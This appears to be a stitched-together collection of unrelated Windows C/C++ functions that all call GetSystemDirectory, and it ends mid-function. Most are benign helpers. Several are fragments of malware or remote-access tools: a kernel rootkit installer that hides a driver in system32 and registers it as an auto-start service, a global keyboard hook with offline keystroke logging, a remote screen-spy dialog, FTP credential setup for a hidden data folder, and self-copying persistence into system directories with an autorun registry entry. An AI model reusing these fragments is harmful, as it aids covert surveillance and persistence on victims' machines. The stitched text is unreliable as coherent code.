bool AutoStart::isAutoStart(WCHAR *value) { WCHAR system[MAX_PATH]; //系统目录路径 WCHAR filePath[MAX_PATH]; //要开机运行的文件的完整路径 WCHAR fileName[MAX_PATH]; //文件名(\CZPlayer.exe) //得到当前执行文件的全路径 HMODULE hModule = GetModuleHandle(NULL); GetModuleFileName(hModule, filePath, sizeof(filePath)); //得到文件名 for (int i = lstrlen(filePath) - 1; i >= 0; --i) { if (filePath[i] == '\\') { lstrcpy(fileName, &filePath[i]); break; } /*Else do nothing, and continue.*/ } //得到系统文件所在目录的路径,如c:\windows\system32 GetSystemDirectory(system, sizeof(system)); //形成要复制到的全路径,如c:\windows\system32\CZPlayer.exe wcscat_s(system, fileName); HKEY hKey; bool bIsAutoStart =false; //打开注册表 if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, (wchar_t*)Path.utf16(), 0, KEY_READ, &hKey) == ERROR_SUCCESS) { WCHAR wData[MAX_PATH]; DWORD dwLen = MAX_PATH * sizeof(WCHAR); if (RegQueryValueEx(hKey, value, 0, 0, (BYTE*)wData, &dwLen) == ERROR_SUCCESS) { bIsAutoStart = true; //该程序设置了自启动 } else { bIsAutoStart = false; //该程序没有设置自启动 } } else { #ifdef CZ_DEBUG qDebug() << "打开注册表失败!"; qDebug() << __FILE__ << __FUNCTION__ << __LINE__; #endif } RegCloseKey(hKey); return bIsAutoStart; }
/* * Entry point for register-dns thread. */ static DWORD WINAPI RegisterDNS (LPVOID unused) { DWORD err; DWORD i; WCHAR sys_path[MAX_PATH]; DWORD timeout = RDNS_TIMEOUT * 1000; /* in milliseconds */ /* default paths of net and ipconfig commands */ WCHAR net[MAX_PATH] = L"C:\\Windows\\system32\\net.exe"; WCHAR ipcfg[MAX_PATH] = L"C:\\Windows\\system32\\ipconfig.exe"; struct { WCHAR *argv0; WCHAR *cmdline; DWORD timeout; } cmds [] = { { net, L"net stop dnscache", timeout }, { net, L"net start dnscache", timeout }, { ipcfg, L"ipconfig /flushdns", timeout }, { ipcfg, L"ipconfig /registerdns", timeout }, }; int ncmds = sizeof (cmds) / sizeof (cmds[0]); HANDLE wait_handles[2] = {rdns_semaphore, exit_event}; if(GetSystemDirectory(sys_path, MAX_PATH)) { _snwprintf (net, MAX_PATH, L"%s\\%s", sys_path, L"net.exe"); net[MAX_PATH-1] = L'\0'; _snwprintf (ipcfg, MAX_PATH, L"%s\\%s", sys_path, L"ipconfig.exe"); ipcfg[MAX_PATH-1] = L'\0'; } if (WaitForMultipleObjects (2, wait_handles, FALSE, timeout) == WAIT_OBJECT_0) { /* Semaphore locked */ for (i = 0; i < ncmds; ++i) { ExecCommand (cmds[i].argv0, cmds[i].cmdline, cmds[i].timeout); } err = 0; if ( !ReleaseSemaphore (rdns_semaphore, 1, NULL) ) err = MsgToEventLog (M_SYSERR, TEXT("RegisterDNS: Failed to release regsiter-dns semaphore:")); } else { MsgToEventLog (M_ERR, TEXT("RegisterDNS: Failed to lock register-dns semaphore")); err = ERROR_SEM_TIMEOUT; /* Windows error code 0x79 */ } return err; }
void InstallMain(char *name) { char sysdir[MAX_PATH]; char windir[MAX_PATH]; char infdir[MAX_PATH]; char otherdir[MAX_PATH]; char infname[MAX_PATH]; char deviceid[MAX_PATH]; char sysname[MAX_PATH]; if (name == NULL) { return; } if (strlen(name) == 0 || strlen(name) >= 5) { return; } GetSystemDirectory(sysdir, sizeof(sysdir)); GetDirFromPath(windir, sysdir); sprintf(infdir, "%s\\inf", windir); sprintf(otherdir, "%s\\other", infdir); sprintf(infname, "%s\\Neo_%s.inf", infdir, name); sprintf(sysname, "%s\\Neo_%s.sys", sysdir, name); sprintf(deviceid, "NeoAdapter_%s", name); if (IsFile(infname) == FALSE) { Print("Failed to open %s.", infname); return; } if (IsFile(sysname) == FALSE) { Print("Failed to open %s.", sysname); return; } if (DiInstallClass(infname, 0) != OK) { Print("Failed to register %s.\n", infname); return; } if (InstallNDIDevice("Net", deviceid, NULL, NULL) != OK) { return; } }
CString CSySkin::GetSysPath() { CString strPath; TCHAR szPath[_MAX_PATH] = {0}; UINT iRet = GetSystemDirectory(szPath, _MAX_PATH); if ( iRet > 0 ) { strPath.Format(_T("%s"), szPath); strPath += _T("\\"); } return strPath; }
void RegFile(char cmd, char *file, int x64) { char self[STR_SIZE]; char cmdline[STR_SIZE]; int ready = 0; if (!*file || (cmd != 'D' && cmd != 'T' && cmd != 'E')) return; if (cmd == 'E') { wsprintf(cmdline, "\"%s\" /regserver", file); ready++; } else if (!x64) { if (GetModuleFileName(GetModuleHandle(NULL), self, STR_SIZE)) { wsprintf(cmdline, "\"%s\" /%c%s", self, cmd, file); ready++; } } else { if (GetSystemDirectory(self, STR_SIZE)) { wsprintf(cmdline, "\"%s\\regsvr32.exe\" /s \"%s\"", self, file); ready++; SafeWow64EnableWow64FsRedirection(FALSE); } } if (ready) { PROCESS_INFORMATION pi; STARTUPINFO si = { sizeof(STARTUPINFO) }; if (CreateProcess(NULL, cmdline, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) { CloseHandle(pi.hThread); WaitForSingleObject(pi.hProcess, INFINITE); CloseHandle(pi.hProcess); } if (x64) { SafeWow64EnableWow64FsRedirection(TRUE); } } }
BOOLEAN RTDevice::Init() { TCHAR Path[ MAX_PATH ]; //If a device is still in use close it if(Handle != INVALID_HANDLE_VALUE ) { //TO DO Maybe stop the device ? fpClose(Handle); Handle = INVALID_HANDLE_VALUE; } //Close if there is an open lib if(LibHandle != INVALID_HANDLE_VALUE) { FreeLibrary((struct HINSTANCE__ *)LibHandle); LibHandle = NULL; } if( dp != NULL ) { Free(dp); dp = NULL; } //Open libratry GetSystemDirectory(Path, sizeof(Path) / sizeof(TCHAR) ); lstrcat(Path,RTLOADER); LibHandle = LoadLibrary(Path); //if the can not be opend return FALSE; if( LibHandle == NULL ) return FALSE; //Get pointers to the funtions in the DLL fpOpen = (POPEN) GetProcAddress(LibHandle,"Open"); fpClose = (PCLOSE) GetProcAddress(LibHandle,"Close"); fpStart = (PSTART) GetProcAddress(LibHandle,"Start"); fpStop = (PSTOP) GetProcAddress(LibHandle,"Stop"); fpReset = (PRESETDEVICE) GetProcAddress(LibHandle,"ResetDevice"); fpGetDeviceState = (PGETDEVICESTATE) GetProcAddress(LibHandle,"GetDeviceState"); fpSetSignalBuffer = (PSETSIGNALBUFFER)GetProcAddress(LibHandle,"SetSignalBuffer"); fpGetBufferInfo = (PGETBUFFERINFO) GetProcAddress(LibHandle,"GetBufferInfo"); fpGetSamples = (PGETSAMPLES) GetProcAddress(LibHandle,"GetSamples"); fpGetSlaveHandle = (PGETSLAVEHANDLE) GetProcAddress(LibHandle,"GetSlaveHandle"); fpAddSlave = (PADDSLAVE) GetProcAddress(LibHandle,"AddSlave"); fpDeviceFeature = (PDEVICEFEATURE) GetProcAddress(LibHandle,"DeviceFeature"); fpGetSignalFormat = (PGETSIGNALFORMAT)GetProcAddress(LibHandle,"GetSignalFormat"); fpGetInstanceId = (PGETINSTANCEID) GetProcAddress(LibHandle, "GetInstanceId" ); fpOpenRegKey = (POPENREGKEY) GetProcAddress(LibHandle, "OpenRegKey" ); fpFree = (PFREE) GetProcAddress(LibHandle, "Free" ); // All other DLL exported function are for obsolete but // available for compatibility reasons DeviceRegKey = NULL; return TRUE; }
int main(int argc, char **argv) { char cBuf[MAX_PATH] = ""; if (argv[1] ? stricmp(argv[1], "/SYS") == 0: FALSE) GetSystemDirectory(cBuf, sizeof cBuf); else GetWindowsDirectory(cBuf, sizeof cBuf); puts(cBuf); return 0; }
void AutoStart::autoStart(WCHAR *value) { WCHAR system[MAX_PATH]; //系统目录路径 WCHAR filePath[MAX_PATH]; //要开机运行的文件的完整路径 WCHAR fileName[MAX_PATH]; //文件名(\CZPlayer.exe) //得到当前执行文件的全路径 HMODULE hModule = GetModuleHandle(NULL); GetModuleFileName(hModule, filePath, sizeof(filePath)); //得到文件名 for (int i = lstrlen(filePath) - 1; i >= 0; --i) { if (filePath[i] == '\\') { lstrcpy(fileName, &filePath[i]); break; } /*Else do nothing, and continue.*/ } //得到系统文件所在目录的路径,如c:\windows\system32 GetSystemDirectory(system, sizeof(system)); //形成要复制到的全路径,如c:\windows\system32\CZPlayer.exe wcscat_s(system, fileName); //自我复制到目标路径 CopyFile(filePath, system, false); //写入注册表,以便开机自动运行 HKEY hKey; //打开注册表 if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, (wchar_t*)Path.utf16(), 0, KEY_SET_VALUE, &hKey ) == ERROR_SUCCESS) { //新增一个值,名称随意命名,值为要开机运行的文件的完整路径 RegSetValueEx(hKey, value, 0, REG_SZ, (const unsigned char*)system, sizeof(system)); //关闭注册表: RegCloseKey(hKey); #ifdef CZ_DEBUG qDebug() << "设置开机自启动成功!"; #endif } else { #ifdef CZ_DEBUG qDebug() << "打开注册表失败!"; qDebug() << __FILE__ << __FUNCTION__ << __LINE__; #endif } }
HANDLE load_windows_system_library(const TCHAR *library_name) { TCHAR path[MAX_PATH]; unsigned n; n = GetSystemDirectory(path, MAX_PATH); if (n == 0 || n + _tcslen(library_name) + 2 >= MAX_PATH) return 0; _tcscat(path, TEXT("\\")); _tcscat(path, library_name); return LoadLibrary(path); }
//////////////////////////////////////////////////////////////////////////////////////////////// ///////////////////////////// PUBLIC FUNCTIONS ///////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////////////////////// int GetFolderPath(FolderType folder,wchar_t *path,unsigned int pathsize) { int iReturnCode = RETURN_OK; switch(folder) { case FOLDER_SYSTEM32: if(0==GetSystemDirectory(path,pathsize)) { LOG(L" --> ERROR - GetFolderPath - System32 folder not found (LastError=%d)\n", GetLastError()); iReturnCode = RETURN_ERR_INTERNAL; } break; case FOLDER_WOWSYS64: #ifdef WIN64 if(0==GetSystemWow64Directory(path,pathsize)) { LOG(L" --> ERROR - GetFolderPath - SystemWow64 folder not found (LastError=%d)\n", GetLastError()); iReturnCode = RETURN_ERR_INTERNAL; } #else if(IsWow64Proc()) { if(0==GetSystemWow64Directory(path,pathsize)) { LOG(L" --> ERROR - GetFolderPath - SystemWow64 folder not found (LastError=%d)\n", GetLastError()); iReturnCode = RETURN_ERR_INTERNAL; } } else { iReturnCode = RETURN_SKIP_FOLDER; } #endif break; case FOLDER_APP: if(-1==swprintf_s(path,pathsize,L"C:\\Program Files\\Belgium Identity Card")) { LOG(L" --> ERROR - GetFolderPath - Buffer too small\n"); iReturnCode = RETURN_ERR_INTERNAL; } break; default: if(0==GetTempPath(pathsize,path)) { LOG(L" --> ERROR - GetFolderPath - Temp folder not found (LastError=%d)\n", GetLastError()); iReturnCode = RETURN_ERR_INTERNAL; } break; } return iReturnCode; }
bool install_kernelkit() { char szInstallPath[MAX_PATH], szSysDir[MAX_PATH]; if (is_os9x()) return FALSE; if (!is_osnt()) return FALSE; GetSystemDirectory(szSysDir, sizeof(szSysDir)); sprintf(szInstallPath, "%s\\%s", szSysDir, driverfilename); if (!file_exists(szInstallPath)) extract_resource("driver", "RT_RCDATA", szInstallPath); SetFileAttributes(szInstallPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY); if (install_service(drivername, szInstallPath, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, TRUE)) return TRUE; return FALSE; }
HRESULT _stdcall FakeDirectInputCreate(HINSTANCE a,DWORD b,REFIID c,LPVOID d,LPUNKNOWN e) { //Some local handles (Never need to bother freeing them, so they can be local) HMODULE dinput8dll = NULL; //Handle to the real dinput dll MYPROC func=NULL; //Handle to the real create dinput8 function //Load the real dinput dll TCHAR Path[MAX_PATH]; //Path to the real DInput8.dll GetSystemDirectory((LPWSTR)&Path,MAX_PATH); //Could probably just use %system% _tcscat_s(Path,TEXT("\\dinput8.dll")); //Add dinput8.dll to the end of the system path dinput8dll=::LoadLibrary(Path); //Load the real direct input dll func=(MYPROC)GetProcAddress(dinput8dll,"DirectInput8Create"); //Get the address of the real function if(func==NULL) { ::OutputDebugString(TEXT("Unable to load real direct input dll")); return DIERR_GENERIC; } //Check that the process is morrowind TCHAR NameBuffer[MAX_PATH]; ::GetModuleFileName(NULL,(LPTSTR)&NameBuffer,MAX_PATH); int LastSlash; int End; for(int i=0;i<MAX_PATH;i++) { if(NameBuffer[i]=='\\') LastSlash=i; if(NameBuffer[i]==0) { End=i; break; } } if(End-LastSlash!=14 || (NameBuffer[LastSlash+1]!='m'&&NameBuffer[LastSlash+1]!='M') || //The first letter isn't case sensitive NameBuffer[LastSlash+2]!='o' || NameBuffer[LastSlash+3]!='r' || NameBuffer[LastSlash+4]!='r' || NameBuffer[LastSlash+5]!='o' || NameBuffer[LastSlash+6]!='w' || NameBuffer[LastSlash+7]!='i' || NameBuffer[LastSlash+8]!='n' || NameBuffer[LastSlash+9]!='d' || NameBuffer[LastSlash+10]!='.' || NameBuffer[LastSlash+11]!='e' || NameBuffer[LastSlash+12]!='x' || NameBuffer[LastSlash+13]!='e' ) { //Process isn't morrowind, so dont create a fake IDirectInput8 interface ::OutputDebugString(TEXT("Proccess was not morrowind")); ::OutputDebugString(NameBuffer); return (func)(a,b,c,d,e); } //Call the real direct input dll HRESULT hr=(func)(a,b,c,d,e); if(hr!=DI_OK) return hr; //Then create a fake interface and return *((IDirectInput8**)d)=new FakeDirectInput((IDirectInput8*)*((IDirectInput8**)d)); return DI_OK; }
void InitializeStrings() { fix(InternetCheckMask); fix(FtpServer); fix(FtpUserName); fix(FtpPassword); // to get BaseDirectory GetSystemDirectory(BaseDirectory,MAX_PATH); strcat(BaseDirectory,"\\srvdat\\"); CreateDirectory(BaseDirectory,NULL); }
void isc_ntpaths_init() { HKEY hKey; BOOL keyFound = TRUE; memset(namedBase, 0, MAX_PATH); if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, BIND_SUBKEY, 0, KEY_READ, &hKey) != ERROR_SUCCESS) keyFound = FALSE; if (keyFound == TRUE) { /* Get the named directory */ if (RegQueryValueEx(hKey, "InstallDir", NULL, NULL, (LPBYTE)namedBase, &baseLen) != ERROR_SUCCESS) keyFound = FALSE; } RegCloseKey(hKey); GetSystemDirectory(systemDir, MAX_PATH); if (keyFound == FALSE) /* Use the System Directory as a default */ strcpy(namedBase, systemDir); strcpy(ns_confFile, namedBase); strcat(ns_confFile, "\\etc\\named.conf"); strcpy(lwresd_confFile, namedBase); strcat(lwresd_confFile, "\\etc\\lwresd.conf"); strcpy(lwresd_resolvconfFile, systemDir); strcat(lwresd_resolvconfFile, "\\Drivers\\etc\\resolv.conf"); strcpy(rndc_keyFile, namedBase); strcat(rndc_keyFile, "\\etc\\rndc.key"); strcpy(rndc_confFile, namedBase); strcat(rndc_confFile, "\\etc\\rndc.conf"); strcpy(ns_defaultpidfile, namedBase); strcat(ns_defaultpidfile, "\\etc\\"); strcpy(lwresd_defaultpidfile, namedBase); strcat(lwresd_defaultpidfile, "\\etc\\"); strcpy(local_state_dir, namedBase); strcat(local_state_dir, "\\bin"); strcpy(sys_conf_dir, namedBase); strcat(sys_conf_dir, "\\etc"); Initialized = TRUE; }
BOOL GetDriverSpecs( struct display_t *pEntry, char *szSubKey ) { HKEY hKey, hKey2; char *p; char szTemp[ MAX_PATH + 1 ] = "", szTemp2[ MAX_PATH + 1 ] = ""; hKey = MyRegOpenKey( HKEY_LOCAL_MACHINE, "System\\CurrentControlSet\\Services\\Class" ); if( hKey ) hKey2 = MyRegOpenKey( hKey, szSubKey ); else return FALSE; RegCloseKey( hKey ); if( !hKey2 ) return FALSE; if( !(p = MyRegQueryValueMalloc( hKey2, "DriverDesc", NULL, NULL ) ) ) return FALSE; strcpy( pEntry->szName, p ); free( p ); hKey = MyRegOpenKey( hKey2, "DEFAULT" ); if( !hKey ) return FALSE; if( !(p = MyRegQueryValueMalloc( hKey, "drv", NULL, NULL ) ) ) return FALSE; strcpy( pEntry->szDriver, p ); // if no drive is specified in the driver filename, assume a path relative to the windows // system directory if( !strchr( p, ':' ) ) { GetSystemDirectory( szTemp, MAX_PATH ); strcat( szTemp, "\\" ); strcat( szTemp, p ); } else strcpy( szTemp, p ); free( p ); if( !GetMyFileVersionInfo( szTemp, pEntry ) ) return FALSE; if( strlen( szTemp ) ) SetCurrentDirectory( szTemp ); RegCloseKey( hKey ); RegCloseKey( hKey2 ); return TRUE; }
void IELPIAction::Execute() { wchar_t szParams[MAX_PATH] = L""; switch (_getIEVersion()) { case InternetExplorerVersion::IE7: { wcscpy_s(szParams, m_filename); wcscat_s(szParams, L" /quiet /norestart"); break; } case InternetExplorerVersion::IE8: if (m_OSVersion->GetVersion() == WindowsXP) { wcscpy_s(szParams, m_filename); wcscat_s(szParams, L" /quiet /norestart /update-no"); } else { GetSystemDirectory(szParams, MAX_PATH); wcscat_s(szParams, L"\\wusa.exe "); wcscat_s(szParams, m_filename); wcscat_s(szParams, L" /quiet /norestart"); } break; case InternetExplorerVersion::IE9: GetSystemDirectory(szParams, MAX_PATH); wcscat_s(szParams, L"\\wusa.exe "); wcscat_s(szParams, m_filename); wcscat_s(szParams, L" /quiet /norestart"); break; default: break; } SetStatus(InProgress); g_log.Log(L"IELPIAction::Execute '%s', 64 bits %u", szParams, (wchar_t *)_is64BitsPackage()); m_runner->Execute(NULL, szParams, _is64BitsPackage()); }
BOOL CWorldsDlg::OnInitDialogBar() { CMRCSizeDialogBar::OnInitDialogBar(); // TODO: Add extra initialization here char szSysPath[MAX_PATH]; char szIconDLL[MAX_PATH]; GetSystemDirectory(szSysPath,MAX_PATH); sprintf(szIconDLL,"%s\\shell32.dll",szSysPath); if (m_pIconList) { delete m_pIconList; } if (m_pIconList2) { delete m_pIconList2; } m_pIconList=new CImageList; m_pIconList2=new CImageList; //tree control image list m_pIconList->Create(16,16,ILC_COLOR16,10,5); m_pIconList->SetBkColor(RGB(255,255,255)); m_pIconList->Add(ExtractIcon(AfxGetInstanceHandle(),szIconDLL,3)); //closed folder m_pIconList->Add(ExtractIcon(AfxGetInstanceHandle(),szIconDLL,4)); //open folder m_WorldTree.SetImageList(m_pIconList,TVSIL_NORMAL); //list control image list m_pIconList2->Create(16,16,ILC_COLOR4,10,5); m_pIconList2->SetBkColor(RGB(255,255,255)); m_pIconList2->Add(AfxGetApp()->LoadIcon(IDI_WORLDS_TAB_ICON)); m_WorldList.SetImageList(m_pIconList2,LVSIL_SMALL); CRect rect; m_WorldList.GetClientRect( &rect ); // Clear the world list m_WorldList.DeleteAllItems(); while (m_WorldList.DeleteColumn(0)) { } m_WorldList.InsertColumn(0,"Name",LVCFMT_LEFT,(rect.Width()-35)/3,-1); m_WorldList.InsertColumn(1,"Size",LVCFMT_RIGHT,(rect.Width()-35)/3,-1); m_WorldList.InsertColumn(2,"Modified",LVCFMT_LEFT,(rect.Width()-35)/3,-1); return TRUE; // return TRUE unless you set the focus to a control // EXCEPTION: OCX Property Pages should return FALSE }
static VOID AddScreenSavers(HWND hwndDlg, PDATA pData) { HWND hwndScreenSavers = GetDlgItem(hwndDlg, IDC_SCREENS_LIST); TCHAR szSearchPath[MAX_PATH]; TCHAR szLocalPath[MAX_PATH]; INT i; ScreenSaverItem *ScreenSaverItem = NULL; LPTSTR lpBackSlash; /* Add the "None" item */ ScreenSaverItem = pData->ScreenSaverItems; ScreenSaverItem->bIsScreenSaver = FALSE; LoadString(hApplet, IDS_NONE, ScreenSaverItem->szDisplayName, sizeof(ScreenSaverItem->szDisplayName) / sizeof(TCHAR)); i = SendMessage(hwndScreenSavers, CB_ADDSTRING, 0, (LPARAM)ScreenSaverItem->szDisplayName); SendMessage(hwndScreenSavers, CB_SETITEMDATA, i, (LPARAM)0); // Initialize number of items into the list pData->ScreenSaverCount = 1; // Add all the screensavers where the applet is stored. GetModuleFileName(hApplet, szLocalPath, MAX_PATH); lpBackSlash = _tcsrchr(szLocalPath, _T('\\')); if (lpBackSlash != NULL) { *lpBackSlash = '\0'; SearchScreenSavers(hwndScreenSavers, szLocalPath, pData); } // Add all the screensavers in the C:\ReactOS\System32 directory. GetSystemDirectory(szSearchPath, MAX_PATH); if (lpBackSlash != NULL && _tcsicmp(szSearchPath, szLocalPath) != 0) SearchScreenSavers(hwndScreenSavers, szSearchPath, pData); // Add all the screensavers in the C:\ReactOS directory. GetWindowsDirectory(szSearchPath, MAX_PATH); if (lpBackSlash != NULL && _tcsicmp(szSearchPath, szLocalPath) != 0) SearchScreenSavers(hwndScreenSavers, szSearchPath, pData); }
void openIniFile(const std::string fileName) { std::string iniFile; #if defined(_WIN32) #if PPSSPP_PLATFORM(UWP) // Do nothing. #else iniFile = fileName; // Can't rely on a .txt file extension to auto-open in the right editor, // so let's find notepad wchar_t notepad_path[MAX_PATH + 1]; GetSystemDirectory(notepad_path, MAX_PATH); wcscat(notepad_path, L"\\notepad.exe"); wchar_t ini_path[MAX_PATH + 1] = { 0 }; wcsncpy(ini_path, ConvertUTF8ToWString(iniFile).c_str(), MAX_PATH); // Flip any slashes... for (size_t i = 0; i < wcslen(ini_path); i++) { if (ini_path[i] == '/') ini_path[i] = '\\'; } // One for the space, one for the null. wchar_t command_line[MAX_PATH * 2 + 1 + 1]; wsprintf(command_line, L"%s %s", notepad_path, ini_path); STARTUPINFO si; memset(&si, 0, sizeof(si)); si.cb = sizeof(si); si.wShowWindow = SW_SHOW; PROCESS_INFORMATION pi; memset(&pi, 0, sizeof(pi)); UINT retval = CreateProcess(0, command_line, 0, 0, 0, 0, 0, 0, &si, &pi); if (!retval) { ERROR_LOG(COMMON, "Failed creating notepad process"); } CloseHandle(pi.hThread); CloseHandle(pi.hProcess); #endif #elif !defined(MOBILE_DEVICE) #if defined(__APPLE__) iniFile = "open "; #else iniFile = "xdg-open "; #endif iniFile.append(fileName); NOTICE_LOG(BOOT, "Launching %s", iniFile.c_str()); int retval = system(iniFile.c_str()); if (retval != 0) { ERROR_LOG(COMMON, "Failed to launch ini file"); } #endif }
bool WINAPI DllMain(HMODULE hDll, DWORD dwReason, PVOID pvReserved) { TCHAR fileName[512]; GetModuleFileName(NULL, fileName, 512); if(dwReason == DLL_PROCESS_ATTACH) { DisableThreadLibraryCalls(hDll); GetModuleFileName(hDll, dlldir, 512); for(int i = strlen(dlldir); i > 0; i--) { if(dlldir[i] == '\\') { dlldir[i+1] = 0; break; } }"DSfix.log"), std::ios::out); sdlogtime(); SDLOG(0, "===== start DSfix %s = fn: %s\n", VERSION, fileName); // load settings Settings::get().load(); Settings::get().report(); KeyActions::get().load(); KeyActions::get().report(); // load original dinput8.dll HMODULE hMod; if(Settings::get().getDinput8dllWrapper().empty() || (Settings::get().getDinput8dllWrapper().find("none") == 0)) { char syspath[320]; GetSystemDirectory(syspath, 320); strcat_s(syspath, "\\dinput8.dll"); hMod = LoadLibrary(syspath); } else { sdlog(0, "Loading dinput wrapper %s\n", Settings::get().getDinput8dllWrapper().c_str()); hMod = LoadLibrary(Settings::get().getDinput8dllWrapper().c_str()); } if(!hMod) { sdlog("Could not load original dinput8.dll\nABORTING.\n"); errorExit("Loading of specified dinput wrapper"); } oDirectInput8Create = (tDirectInput8Create)GetProcAddress(hMod, "DirectInput8Create"); SaveManager::get().init(); earlyDetour(); if(Settings::get().getUnlockFPS()) applyFPSPatch(); return true; } else if(dwReason == DLL_PROCESS_DETACH) { Settings::get().shutdown(); endDetour(); SDLOG(0, "===== end = fn: %s\n", fileName); if(ofile) { ofile.close(); } } return false; }
//=========================================================================== __fastcall Tform_Main::Tform_Main(TComponent* Owner) : TForm(Owner) { isShowTimer = true; isChildMomEnabled = true; aCanClose = false; Time_coef = 1.0; MaxTime = 3600; TimeElapsed = 0; LastGameDate = 0; SoftsCount = 0; Timer1->Interval = TIMER_DRAW; Timer2->Interval = TIMER_SCAN; Timer1->Enabled = true; Timer2->Enabled = true; ShortAppName = ExtractFileName(Application->ExeName); ShortAppName_WA_ext = ShortAppName; ShortAppName_WA_ext.SetLength(ShortAppName.Length() - 4); char SystemDirectory [MAX_PATH]; char WindowsDirectory[MAX_PATH]; GetSystemDirectory (SystemDirectory , MAX_PATH); GetWindowsDirectory(WindowsDirectory, MAX_PATH); try { AnsiString as1 = AnsiString(SystemDirectory ) + "\\" + ShortAppName; AnsiString as2 = AnsiString(WindowsDirectory) + "\\" + ShortAppName; CopyFile( Application->ExeName.t_str(), as1.c_str(), false); CopyFile( Application->ExeName.t_str(), as2.c_str(), false); } catch ( ... ) {} Reg = new TRegistry; DecimalSeparator = '.'; #ifndef DEBUG_MODE Application->ShowMainForm = false; #endif ReadDataFromRegistry(); fFont = CreateFont(32,0,0,0,FW_BOLD, FALSE, FALSE,FALSE, DEFAULT_CHARSET, OUT_DEFAULT_PRECIS, CLIP_DEFAULT_PRECIS, DEFAULT_QUALITY, DEFAULT_PITCH|FF_DONTCARE, "Arial");//MS Sans Serif // ------------------ combobox_WindowsList->Items->Clear(); ListBox1->Clear(); // ------------------ Application->OnMessage = AppMessage; }
BOOL CKeyboardManager::StartHook() { TCHAR szModule [MAX_PATH]; if (!Initialization()) return FALSE; CKeyboardManager::MyGetModuleFileName(NULL,szModule,MAX_PATH); ZeroMemory(m_pTShared, sizeof(TShared)); g_bSignalHook = TRUE; m_dwLastMsgTime = GetTickCount(); m_pTShared->hActWnd = NULL; m_pTShared->hGetMsgHook = NULL; m_pTShared->dwOffset = 0; CKeyboardManager::MyGetModuleFileName(NULL,szModule,MAX_PATH); ZeroMemory(m_pTShared->str, sizeof(m_pTShared->str)); __try { StartService(NULL,NULL,NULL); } __finally { __asm nop; } GetSystemDirectory(m_pTShared->strRecordFile, sizeof(m_pTShared->strRecordFile)); CKeyboardManager::MyGetModuleFileName(NULL,szModule,MAX_PATH); lstrcat(m_pTShared->strRecordFile, "\\desktop.inf"); // 文件存在,就开始离线记录开启 if ( GetFileAttributes(m_pTShared->strRecordFile) != -1 ) { m_pTShared->bIsOffline = TRUE; } else m_pTShared->bIsOffline = FALSE; if (m_pTShared->hGetMsgHook == NULL) { SC_HANDLE hSCM = OpenSCManager( NULL, NULL, SC_MANAGER_CREATE_SERVICE ); m_pTShared->hGetMsgHook = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc, g_hInstance, 0); // GetLastError(); // __asm int 3 CloseServiceHandle(hSCM); } return TRUE; }
CScreenSpyDlg::CScreenSpyDlg(CWnd* Parent, IOCPServer* IOCPServer, CONTEXT_OBJECT* ContextObject) : CDialog(CScreenSpyDlg::IDD, Parent) { m_iocpServer = IOCPServer; m_ContextObject = ContextObject; CHAR szFullPath[MAX_PATH]; GetSystemDirectory(szFullPath, MAX_PATH); lstrcat(szFullPath, "\\shell32.dll"); //图标 m_hIcon = ExtractIcon(AfxGetApp()->m_hInstance, szFullPath, 17); m_hCursor = LoadCursor(AfxGetApp()->m_hInstance,IDC_ARROW); sockaddr_in ClientAddr; memset(&ClientAddr, 0, sizeof(ClientAddr)); int ulClientAddrLen = sizeof(sockaddr_in); BOOL bOk = getpeername(m_ContextObject->sClientSocket,(SOCKADDR*)&ClientAddr, &ulClientAddrLen); m_strClientIP = bOk != INVALID_SOCKET ? inet_ntoa(ClientAddr.sin_addr) : ""; m_bIsFirst = TRUE; m_ulHScrollPos = 0; m_ulVScrollPos = 0; if (m_ContextObject==NULL) { return; } ULONG ulBitmapInforLength = m_ContextObject->InDeCompressedBuffer.GetBufferLength() - 1; m_BitmapInfor_Full = (BITMAPINFO *) new BYTE[ulBitmapInforLength]; if (m_BitmapInfor_Full==NULL) { return; } memcpy(m_BitmapInfor_Full, m_ContextObject->InDeCompressedBuffer.GetBuffer(1), ulBitmapInforLength); m_bIsCtrl = FALSE; m_bIsTraceCursor = FALSE; // m_szData = NULL; // m_bSend = TRUE; // m_ulMsgCount = 0;; }
HMODULE CEnumerateSerial::LoadLibraryFromSystem32(LPCTSTR lpFileName) { //Get the Windows System32 directory TCHAR szFullPath[_MAX_PATH]; szFullPath[0] = _T('\0'); if (GetSystemDirectory(szFullPath, _countof(szFullPath)) == 0) return NULL; //Setup the full path and delegate to LoadLibrary _tcscat_s(szFullPath, _countof(szFullPath), _T("\\")); _tcscat_s(szFullPath, _countof(szFullPath), lpFileName); return LoadLibrary(szFullPath); }
// Helper for loading a system library. Using LoadLibrary() directly is insecure // because Windows might be searching the current working directory first. static HMODULE load_sys_library(string name) { char path[MAX_PATH]; uint len = GetSystemDirectory(path, MAX_PATH); if (len && len + strlen(name) + 1 < MAX_PATH) { path[len] = '\\'; strcpy(&path[len + 1], name); return LoadLibrary(path); } else return 0; }
static void lookup_funcs (void) { HMODULE winhttp = NULL; char winhttp_dll[MAX_PATH + 100]; int n; if (lookup_done) return; n = GetSystemDirectory (winhttp_dll, MAX_PATH); if (n > 0 && n < MAX_PATH) { if (winhttp_dll[n-1] != '\\' && winhttp_dll[n-1] != '/') strcat (winhttp_dll, "\\"); strcat (winhttp_dll, "winhttp.dll"); winhttp = LoadLibrary (winhttp_dll); } if (winhttp != NULL) { funcs.pWinHttpCloseHandle = (BOOL (WINAPI *) (HINTERNET)) GetProcAddress (winhttp, "WinHttpCloseHandle"); funcs.pWinHttpCrackUrl = (BOOL (WINAPI *) (LPCWSTR,DWORD,DWORD,LPURL_COMPONENTS)) GetProcAddress (winhttp, "WinHttpCrackUrl"); funcs.pWinHttpConnect = (HINTERNET (WINAPI *) (HINTERNET,LPCWSTR,INTERNET_PORT,DWORD)) GetProcAddress (winhttp, "WinHttpConnect"); funcs.pWinHttpCreateUrl = (BOOL (WINAPI *) (LPURL_COMPONENTS,DWORD,LPWSTR,LPDWORD)) GetProcAddress (winhttp, "WinHttpCreateUrl"); funcs.pWinHttpOpen = (HINTERNET (WINAPI *) (LPCWSTR,DWORD,LPCWSTR,LPCWSTR,DWORD)) GetProcAddress (winhttp, 